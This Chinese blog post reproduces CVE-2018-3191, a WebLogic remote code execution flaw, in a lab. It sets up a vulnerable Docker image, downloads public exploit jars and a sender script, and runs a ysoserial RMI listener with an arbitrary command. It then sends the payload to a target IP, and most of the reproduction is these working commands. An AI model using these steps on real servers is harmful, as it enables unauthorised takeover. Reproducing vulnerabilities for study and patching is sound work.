CVE-2018-3191 复现

作者: print("") 分类: 信息安全,漏洞复现 发布时间: 2019-03-10 04:57

漏洞描述:

北京时间2018年10月17日,Oracle官方发布的10月关键补充更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。

该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行。

甲骨文官方CPU链接:

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

官方修复方案:

Oracle官方已经在10月关键补补更新CPU(重要补丁更新)中修复了该漏洞,强烈建议受影响的用户尽快升级更新进行防护。

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW

复现:

说明: 靶机: 103.231.12.172

Docker 搭建环境

docker pull ismaleiva90/weblogic12

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest
http://localhost:49163/console
User: weblogic
Pass: welcome1

开放所需要的端口

访问一下  

可以访问那么环境搭建成功

攻击机器的环境需要(java 环境)

攻击机器下载

wget https://github.com/voidfyoo/CVE-2018-3191/releases/download/10.3.6.0/weblogic-spring-jndi-10.3.6.0.jar

wget https://github.com/voidfyoo/CVE-2018-3191/releases/download/12.2.1.3/weblogic-spring-jndi-12.2.1.3.jar

wget https://github.com/Liang2580/CVE-2018-3192/blob/master/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

wget https://github.com/Liang2580/CVE-2018-3192/blob/master/weblogic.py

Linsten java RMI

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6668 CommonsCollections1 "command"

“command” 代表需要执行的命令

例如:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6668 CommonsCollections1 "touch /tmp/123.txt"

将有效负载发送到T3

java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://xxx.xxx.xxx.xxx:6668/liang2580 > liang2580.txt 
python weblogic.py 103.231.12.172 49163 liang2580.txt

验证:

查看靶机的机器中是否存在文件

视频教程如下:

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

说点什么

avatar
  Subscribe  
提醒